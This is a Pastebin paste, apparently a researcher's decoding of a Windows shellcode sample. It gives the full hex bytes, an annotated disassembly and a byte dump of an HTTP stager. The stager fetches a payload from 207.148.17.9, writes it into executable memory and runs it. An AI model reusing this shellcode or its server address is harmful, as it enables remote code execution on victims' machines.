API tools faq
paste
Advertisement
James_inthe_box

Decoded

James_inthe_box
Mar 7th, 2018
296
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.86 KB | None | 0 0
raw download clone embed print report
  1. Hex dump: fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f2 52 57 8b 52 10 8b 4a 3c 8b 4c 11 78 e3 48 01 d1 51 8b 59 20 01 d3 8b 49 18 e3 3a 49 8b 34 8b 01 d6 31 ff ac c1 cf 0d 01 c7 38 e0 75 f6 03 7d f8 3b 7d 24 75 e4 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 5f 5f 5a 8b 12 eb 8d 5d 68 6e 65 74 00 68 77 69 6e 69 54 68 4c 77 26 07 ff d5 31 db 53 53 53 53 53 68 3a 56 79 a7 ff d5 53 53 6a 03 53 53 6a 50 e8 b0 00 00 00 2f 79 6d 42 4e 43 54 46 51 36 43 67 38 4c 54 30 73 5a 72 4c 66 4f 77 55 2d 6b 65 32 42 53 00 50 68 57 89 9f c6 ff d5 89 c6 53 68 00 32 e0 84 53 53 53 57 53 56 68 eb 55 2e 3b ff d5 96 6a 0a 5f 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 53 53 53 53 56 68 2d 06 18 7b ff d5 85 c0 75 16 68 88 13 00 00 68 44 f0 35 e0 ff d5 4f 75 cd 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 53 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 e2 ff d5 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 5f e8 69 ff ff ff 32 30 37 2e 31 34 38 2e 31 37 2e 39 00
  2. 0x00000000 fc cld
  3. 0x00000001 e882000000 call 0x00000088
  4. 0x00000006 60 pushad
  5. 0x00000007 89e5 mov ebp,esp
  6. 0x00000009 31c0 xor eax,eax
  7. 0x0000000b 648b5030 fs: mov edx,dword [eax + 48]
  8. 0x0000000f 8b520c mov edx,dword [edx + 12]
  9. 0x00000012 8b5214 mov edx,dword [edx + 20]
  10. 0x00000015 8b7228 mov esi,dword [edx + 40]
  11. 0x00000018 0fb74a26 movzx ecx,word [edx + 38]
  12. 0x0000001c 31ff xor edi,edi
  13. 0x0000001e ac lodsb
  14. 0x0000001f 3c61 cmp al,97
  15. 0x00000021 7c02 jl 0x00000025
  16. 0x00000023 2c20 sub al,32
  17. 0x00000025 c1cf0d ror edi,13
  18. 0x00000028 01c7 add edi,eax
  19. 0x0000002a e2f2 loop 0x0000001e
  20. 0x0000002c 52 push edx
  21. 0x0000002d 57 push edi
  22. 0x0000002e 8b5210 mov edx,dword [edx + 16]
  23. 0x00000031 8b4a3c mov ecx,dword [edx + 60]
  24. 0x00000034 8b4c1178 mov ecx,dword [ecx + edx + 120]
  25. 0x00000038 e348 jecxz 0x00000082
  26. 0x0000003a 01d1 add ecx,edx
  27. 0x0000003c 51 push ecx
  28. 0x0000003d 8b5920 mov ebx,dword [ecx + 32]
  29. 0x00000040 01d3 add ebx,edx
  30. 0x00000042 8b4918 mov ecx,dword [ecx + 24]
  31. 0x00000045 e33a jecxz 0x00000081
  32. 0x00000047 49 dec ecx
  33. 0x00000048 8b348b mov esi,dword [ebx + ecx * 4]
  34. 0x0000004b 01d6 add esi,edx
  35. 0x0000004d 31ff xor edi,edi
  36. 0x0000004f ac lodsb
  37. 0x00000050 c1cf0d ror edi,13
  38. 0x00000053 01c7 add edi,eax
  39. 0x00000055 38e0 cmp al,ah
  40. 0x00000057 75f6 jnz 0x0000004f
  41. 0x00000059 037df8 add edi,dword [ebp - 8]
  42. 0x0000005c 3b7d24 cmp edi,dword [ebp + 36]
  43. 0x0000005f 75e4 jnz 0x00000045
  44. 0x00000061 58 pop eax
  45. 0x00000062 8b5824 mov ebx,dword [eax + 36]
  46. 0x00000065 01d3 add ebx,edx
  47. 0x00000067 668b0c4b mov cx,word [ebx + ecx * 2]
  48. 0x0000006b 8b581c mov ebx,dword [eax + 28]
  49. 0x0000006e 01d3 add ebx,edx
  50. 0x00000070 8b048b mov eax,dword [ebx + ecx * 4]
  51. 0x00000073 01d0 add eax,edx
  52. 0x00000075 89442424 mov dword [esp + 36],eax
  53. 0x00000079 5b pop ebx
  54. 0x0000007a 5b pop ebx
  55. 0x0000007b 61 popad
  56. 0x0000007c 59 pop ecx
  57. 0x0000007d 5a pop edx
  58. 0x0000007e 51 push ecx
  59. 0x0000007f ffe0 jmp eax
  60. 0x00000081 5f pop edi
  61. 0x00000082 5f pop edi
  62. 0x00000083 5a pop edx
  63. 0x00000084 8b12 mov edx,dword [edx]
  64. 0x00000086 eb8d jmp 0x00000015
  65. 0x00000088 5d pop ebp
  66. 0x00000089 686e657400 push 0x0074656e--> 'ten'
  67. 0x0000008e 6877696e69 push 0x696e6977--> 'iniw'
  68. 0x00000093 54 push esp
  69. 0x00000094 684c772607 push 0x0726774c--> '&wL'
  70. 0x00000099 ffd5 call ebp --> kernel32.dll!LoadLibraryA
  71. 0x0000009b 31db xor ebx,ebx
  72. 0x0000009d 53 push ebx
  73. 0x0000009e 53 push ebx
  74. 0x0000009f 53 push ebx
  75. 0x000000a0 53 push ebx
  76. 0x000000a1 53 push ebx
  77. 0x000000a2 683a5679a7 push 0xa779563a--> 'yV:'
  78. 0x000000a7 ffd5 call ebp --> wininet.dll!InternetOpenA
  79. 0x000000a9 53 push ebx
  80. 0x000000aa 53 push ebx
  81. 0x000000ab 6a03 push 3
  82. 0x000000ad 53 push ebx
  83. 0x000000ae 53 push ebx
  84. 0x000000af 6a50 push 80
  85. 0x000000b1 e8b0000000 call 0x00000166
  86. 0x000000b6 2f das
  87. 0x000000b7 796d jns 0x00000126
  88. 0x000000b9 42 inc edx
  89. 0x000000ba 4e dec esi
  90. 0x000000bb 43 inc ebx
  91. 0x000000bc 54 push esp
  92. 0x000000bd 46 inc esi
  93. 0x000000be 51 push ecx
  94. 0x000000bf 3643 ss: inc ebx
  95. 0x000000c1 67384c5430 cmp byte [esp + edx * 2 + 48],cl
  96. 0x000000c6 735a jnc 0x00000122
  97. 0x000000c8 724c jc 0x00000116
  98. 0x000000ca 664f dec edi
  99. 0x000000cc 7755 ja 0x00000123
  100. 0x000000ce 2d6b653242 sub eax,0x4232656b
  101. 0x000000d3 53 push ebx
  102. 0x000000d4 005068 add byte [eax + 104],dl
  103. 0x000000d7 57 push edi
  104. 0x000000d8 899fc6ffd589 mov dword [edi - 1982464058],ebx
  105. 0x000000de c6536800 mov byte [ebx + 104],0
  106. 0x000000e2 32e0 xor ah,al
  107. 0x000000e4 845353 test byte [ebx + 83],dl
  108. 0x000000e7 53 push ebx
  109. 0x000000e8 57 push edi
  110. 0x000000e9 53 push ebx
  111. 0x000000ea 56 push esi
  112. 0x000000eb 68eb552e3b push 0x3b2e55eb--> ';.U'
  113. 0x000000f0 ffd5 call ebp --> wininet.dll!HttpOpenRequestA
  114. 0x000000f2 96 xchg eax,esi
  115. 0x000000f3 6a0a push 10
  116. 0x000000f5 5f pop edi
  117. 0x000000f6 6880330000 push 0x00003380
  118. 0x000000fb 89e0 mov eax,esp
  119. 0x000000fd 6a04 push 4
  120. 0x000000ff 50 push eax
  121. 0x00000100 6a1f push 31
  122. 0x00000102 56 push esi
  123. 0x00000103 6875469e86 push 0x869e4675--> 'Fu'
  124. 0x00000108 ffd5 call ebp --> wininet.dll!InternetSetOptionA
  125. 0x0000010a 53 push ebx
  126. 0x0000010b 53 push ebx
  127. 0x0000010c 53 push ebx
  128. 0x0000010d 53 push ebx
  129. 0x0000010e 56 push esi
  130. 0x0000010f 682d06187b push 0x7b18062d--> '{-'
  131. 0x00000114 ffd5 call ebp --> wininet.dll!HttpSendRequestA
  132. 0x00000116 85c0 test eax,eax
  133. 0x00000118 7516 jnz 0x00000130
  134. 0x0000011a 6888130000 push 0x00001388
  135. 0x0000011f 6844f035e0 push 0xe035f044--> '5D'
  136. 0x00000124 ffd5 call ebp --> kernel32.dll!Sleep
  137. 0x00000126 4f dec edi
  138. 0x00000127 75cd jnz 0x000000f6
  139. 0x00000129 68f0b5a256 push 0x56a2b5f0
  140. 0x0000012e ffd5 call ebp --> kernel32.dll!ExitProcess
  141. 0x00000130 6a40 push 64
  142. 0x00000132 6800100000 push 4096
  143. 0x00000137 6800004000 push 0x00400000
  144. 0x0000013c 53 push ebx
  145. 0x0000013d 6858a453e5 push 0xe553a458--> 'SX'
  146. 0x00000142 ffd5 call ebp --> kernel32.dll!VirtualAlloc
  147. 0x00000144 93 xchg eax,ebx
  148. 0x00000145 53 push ebx
  149. 0x00000146 53 push ebx
  150. 0x00000147 89e7 mov edi,esp
  151. 0x00000149 57 push edi
  152. 0x0000014a 6800200000 push 0x00002000
  153. 0x0000014f 53 push ebx
  154. 0x00000150 56 push esi
  155. 0x00000151 68129689e2 push 0xe2899612
  156. 0x00000156 ffd5 call ebp --> wininet.dll!InternetReadFile
  157. 0x00000158 85c0 test eax,eax
  158. 0x0000015a 74cd jz 0x00000129
  159. 0x0000015c 8b07 mov eax,dword [edi]
  160. 0x0000015e 01c3 add ebx,eax
  161. 0x00000160 85c0 test eax,eax
  162. 0x00000162 75e5 jnz 0x00000149
  163. 0x00000164 58 pop eax
  164. 0x00000165 c3 ret
  165. 0x00000166 5f pop edi
  166. 0x00000167 e869ffffff call 0x000000d5
  167. 0x0000016c 3230 xor dh,byte [eax]
  168. 0x0000016e 37 aaa
  169. 0x0000016f 2e313438 cs: xor dword [eax + edi],esi
  170. 0x00000173 2e3137 cs: xor dword [edi],esi
  171. 0x00000176 2e3900 cs: cmp dword [eax],eax
  172.  
  173. Byte Dump:
  174. ......`..1.d.P0.R.R..r(..J&1..<a|.,......RW.R..J<.L.x.H..Q.Y...I..:I.4...1......8.u..}.;}$u.X.X$..f.K.X.........D$$[[aYZQ..__Z....]hnet.hwiniThLw&...1.SSSSSh:Vy...SSj.SSjP...../ymBNCTFQ6Cg8LT0sZrLfOwU-ke2BS.PhW.......Sh.2..SSSWSVh.U.;...j_h.3....j.Pj.VhuF....SSSSVh-..{....u.h....hD.5...Ou.h...V..j@h....h..@.ShX.S....SS..Wh...SVh........t.......u.X._.i...207.148.17.9.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!